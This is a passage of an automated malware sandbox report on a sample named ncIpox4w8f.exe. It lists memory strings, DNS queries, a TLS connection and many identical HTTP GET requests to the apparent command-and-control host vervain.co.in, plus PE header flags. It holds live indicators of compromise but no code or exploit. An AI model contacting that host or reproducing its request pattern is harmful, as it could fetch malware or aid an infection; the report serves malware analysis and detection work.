00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskotxe
                Source: ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.395675590.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.344946189.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/le
                Source: ncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.250684430.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.255360203.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.252950036.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/pe
                Source: ncIpox4w8f.exe, 00000000.00000003.450585994.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.455246680.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457658604.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/c
                Source: ncIpox4w8f.exe, 00000000.00000003.306711396.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/h
                Source: ncIpox4w8f.exe, 00000000.00000003.390661773.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384479510.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/j
                Source: ncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.266148150.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.283324784.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.328765144.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324671146.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/le
                Source: ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/pe
                Source: ncIpox4w8f.exe, 00000000.00000003.255360203.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.252950036.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/roso
                Source: ncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/rpriseCertificates
                Source: ncIpox4w8f.exe, 00000000.00000003.250747131.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/t
                Source: unknownDNS traffic detected: queries for: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: global trafficHTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1User-Agent: lValiHost: vervain.co.in
                Source: unknownHTTPS traffic detected: 199.79.62.221:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: ncIpox4w8f.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: ncIpox4w8f.exeBinary or memory string: OriginalFilename vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.348605602.000000000581A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.374747011.0000000005726000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.248325276.0000000005350000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.304035366.0000000005614000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.350592323.0000000005833000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.293371459.000000000561C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.501025618.000000000591C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.419524616.0000000005820000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.400260793.0000000005904000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.334512087.000000000536E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.261256374.000000000541C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000002.546359558.00000000058FC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.261407563.0000000005450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.248105696.0000000005450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.387645922.0000000005915000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.266085426.000000000542C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.391278569.0000000005914000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.260726768.00000000054E9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.355852428.0000000005851000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.258337624.00000000053D9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.304917725.0000000005534000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.300388973.0000000005422000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.326228795.000000000552E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.379660649.0000000005726000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.301611806.0000000005344000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.251187121.0000000005960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.280932968.00000000053A4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.264576105.0000000005524000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.287375756.000000000515C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.315737156.0000000005504000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.354941522.0000000005640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.295177411.000000000553F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename`@ vs ncIpox4w8f.exe
